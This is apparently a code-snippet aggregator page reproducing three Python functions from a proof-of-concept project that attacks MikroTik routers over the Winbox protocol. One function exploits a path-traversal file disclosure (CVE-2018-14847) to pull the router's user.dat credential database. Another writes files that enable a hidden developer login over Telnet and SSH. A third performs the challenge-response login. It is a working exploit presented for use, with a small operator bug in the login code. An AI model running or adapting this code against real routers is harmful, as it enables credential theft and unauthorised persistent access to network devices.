示例#1
0
文件: test.py 项目: Jie-Geng/PoC
def create_file(ip, port, username, password):
    """
    This function creates the file /pckg/option on the target. This will enable
    the developer login on Telnet and SSH. Oddly, you'll first need to log in
    to Telnet for SSH to work, but I digress...

    :param ip: the ip address of the router
    :param port: the port of the jsproxy we'll connect to
    :param username: the username we'll authenticate with
    :param password: the password we'll authenticate with
    :return: True if we successfully created the file.
    """
    session = WinboxSession(ip, port)
    if not session.connect():
        print("[!] Failed to connect to the remote host.")
        return False

    session_id = 0
    if not session.login(username, password, session_id):
        print("[-] Login failed.")
        return False

    print("[+] Creating /pckg/option on {}:{}".format(ip, port))

    msg = WinboxMessage()
    msg.set_to(2, 2)
    msg.set_command(1)
    msg.set_request_id(1)
    msg.set_reply_expected(True)
    msg.set_session_id(session_id)
    msg.add_string(1, "//./.././.././../pckg/option")
    session.send(msg)

    msg = session.receive()
    if msg.has_error():
        print("[-]", msg.get_error_string())
        return False

    print("[+] Creating /flash/nova/etc/devel-login on {}:{}".format(ip, port))
    msg.reset()
    msg.set_to(2, 2)
    msg.set_command(1)
    msg.set_request_id(2)
    msg.set_reply_expected(True)
    msg.set_session_id(session_id)
    msg.add_string(1, "//./.././.././../flash/nova/etc/devel-login")
    session.send(msg)

    msg = session.receive()
    if msg.has_error():
        print("[-]", msg.get_error_string())
        return False

    return True
示例#2
0
文件: test.py 项目: Jie-Geng/PoC
def get_user_dat(ip, port):
    """
    This function uses the file disclosure vulnerability, CVE-2018-14847, to
    download the user database from /flash/rw/store/user.dat

    :param ip: the address of the router to connect to
    :param port: the winbox port to connect to
    :return: a string containing the user.dat data or an empty string on error
    """

    print("[+] Attempting to connect to {}:{}".format(ip, port))
    session = WinboxSession(ip, port)
    if not session.connect():
        print("[!] Failed to connect to the remote host.")
        return ""

    # open user.dat file
    print("[+] Extracting user.dat...")
    msg = WinboxMessage()
    msg.set_to(2, 2)
    msg.set_command(7)
    msg.set_request_id(1)
    msg.set_reply_expected(True)
    msg.add_string(1, "//./.././.././../flash/rw/store/user.dat")
    session.send(msg)

    msg = session.receive()
    if not msg:
        print("[!] Error receiving an open file response.")
        return ""

    session_id = msg.get_session_id()
    file_size = msg.get_u32(2)

    if file_size == 0:
        print("[!] File size is 0.")
        return ""

    # read the user.dat file
    msg.reset()
    msg.set_to(2, 2)
    msg.set_command(4)
    msg.set_request_id(2)
    msg.set_reply_expected(True)
    msg.set_session_id(session_id)
    msg.add_u32(2, file_size)
    session.send(msg)

    msg = session.receive()
    if not msg:
        print("[!] Error receiving a file content response.")
        return ""

    return msg.get_raw(0x03)
示例#3
0
    def login(self, username, password, session_id):
        """
        Login to the Mikrotik router. Performs Challenge exchage authentication

        :param username: router user name
        :param password: router user password
        :param session_id: session it to connect
        :return: False if failed, session_id if success
        """

        # request the challenge
        msg = WinboxMessage()
        msg.set_to(13, 4)
        msg.set_command(4)
        msg.set_request_id(2)
        msg.set_session_id(session_id)
        msg.set_reply_expected(True)
        if not self.send(msg):
            return False

        msg = self.receive()
        if not msg or msg.has_error():
            print(msg.get_error_string())
            return False

        salt = msg.get_raw(0x9)
        if len(salt) != 16:
            msg = self.receive()
            if not msg | msg.has_error():
                print(msg.get_error_string())
                return False
            salt = msg.get_raw(0x9)

        # generate the challenge response
        m = hashlib.md5()
        one = b'\x00'
        m.update(one)
        m.update(password.encode())
        m.update(salt)
        hashed = one + m.digest()

        msg.reset()
        msg.set_to(13, 4)
        msg.set_command(1)
        msg.set_request_id(3)
        msg.set_session_id(session_id)
        msg.set_reply_expected(True)
        msg.add_string(1, username)
        msg.add_raw(9, salt)
        msg.add_raw(10, hashed)

        if not self.send(msg):
            return False

        msg = self.receive()
        if not msg:
            print("Error receiving a response.")
            return False

        if msg.has_error():
            print(msg.get_error_string())
            return False

        sess_id = msg.get_session_id()

        return sess_id